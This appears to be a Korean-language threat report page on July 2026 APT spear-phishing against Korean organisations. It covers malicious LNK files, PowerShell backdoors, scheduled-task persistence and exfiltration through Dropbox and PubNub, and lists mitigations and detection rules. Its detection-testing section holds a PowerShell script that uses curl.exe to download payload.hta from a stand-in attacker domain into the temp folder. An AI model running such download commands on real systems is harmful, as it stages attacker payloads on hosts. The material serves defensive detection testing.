한국 APT 위협 보고서: 2026년 7월 동향
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
안랩은 스피어 피싱 캠페인을 통해 한국 조직을 표적으로 삼는 APT 활동의 증가를 보고했습니다. 공격은 주로 PowerShell 스크립트, AutoIt 스크립트 및 백도어를 포함한 페이로드를 전달하기 위해 악성 LNK 파일에 의존합니다. 일반적인 기술에는 작업 스케줄러를 통한 지속성과 Dropbox 및 PubNub과 같은 서비스를 통한 데이터 탈취가 포함됩니다.
조사
조사는 2026년 7월 동안 한국 기관에 사용된 APT 인프라를 중심으로 진행되었습니다. 분석가들은 활동을 전달 방법과 기능적 특성에 따라 A부터 G까지 여러 공격 유형으로 그룹화했습니다. 연구자들은 또한 DLL 사이드 로딩 및 curl.exe 등과 같은 기본 Windows 유틸리티의 악용과 같은 행동을 식별했습니다.
완화
사용자는 발신자의 신원을 확인하고 신뢰할 수 없거나 알 수 없는 출처에서 받은 첨부 파일을 열지 않아야 합니다. 조직은 운영 체제 및 웹 브라우저를 최신 보안 패치로 업데이트해야 합니다. V3와 같은 최신 바이러스 백신 및 엔드포인트 보호 솔루션을 유지하는 것도 권장됩니다.
대응
의심스러운 LNK 파일이나 승인되지 않은 작업 스케줄러 항목이 발견되면 사건 대응자는 즉시 영향을 받은 호스트를 격리해야 합니다. 메모리 포렌식을 수행하여 주입된 백도어나 악성 DLL을 식별해야 합니다. 네트워크 로그도 파일 호스팅 서비스 또는 PubNub과 같은 C2 채널로의 비정상적인 아웃바운드 연결에 대해 검토해야 합니다.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
관련 명령어 탐지를 통한 의심스러운 LOLBAS MSHTA 방어 회피 행동 (프로세스 생성 경로)
의심스러운 CURL 사용 (명령줄)
의심스러운 예약 작업 (감사)
타사 서비스/도구를 통한 가능한 데이터 침임/유출/C2 (프록시 경로)
타사 서비스/도구를 통한 가능한 데이터 침임/유출/C2 (DNS 경로)
수행해야 할 IOCs (HashMd5): 2026년 7월 한국에서 APT 공격에 대한 위협 추세 보고서
Curl.Exe를 사용해 악성 파일 다운로드 및 실행 [Windows Sysmon]
LNK 파일 내 악성 PowerShell 명령 탐지 [Windows Powershell]
시뮬레이션 실행
전제 조건: 원격 측정 및 기준 사전 비행 검사 통과해야 함.
이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적 기술(전술,기술,절차)의 정확한 실행을 자세히 설명합니다. 명령과 내러티브는 식별된 TTP를 직접 반영해야 하며 탐지 논리가 기대하는 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련 없는 예시는 오진으로 이어질 것입니다.
-
공격 내러티브 및 명령: 적은
curl.exe을 사용하여%TEMP%디렉터리에 악성 HTA 파일을 다운로드하여 발판을 마련하려 합니다. 현재 탐지 논리가 작동하는지 테스트하기 위해 (“download” 또는 “execute”라는 단어를 찾기 때문에), 공격자는 이 단어를 명령줄에 명시적으로 포함시켜 가짜 인수나 설명의 일부로 사용하여, SOC가 찾고 있는 패턴을 모방하려는 대책이 형성된 스크립트를 시뮬레이션합니다. -
회귀 테스트 스크립트:
# 규칙에서 요구하는 특정 키워드를 사용하여 curl을 사용하는 적을 시뮬레이션 $tempPath = $env:TEMPmalicious.hta $url = "http://attacker-controlled-domain.com/payload.hta" # 이 명령은 'contains' 논리를 트리거하도록 설계되었습니다. # 명령줄 문자열에 'download'와 'execute' 단어를 포함시켜 Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'" -
정리 명령:
# 시뮬레이션 중 생성된 더미 파일 제거 if (Test-Path "$env:TEMPmalicious.hta") { Remove-Item -Path "$env:TEMPmalicious.hta" -Force }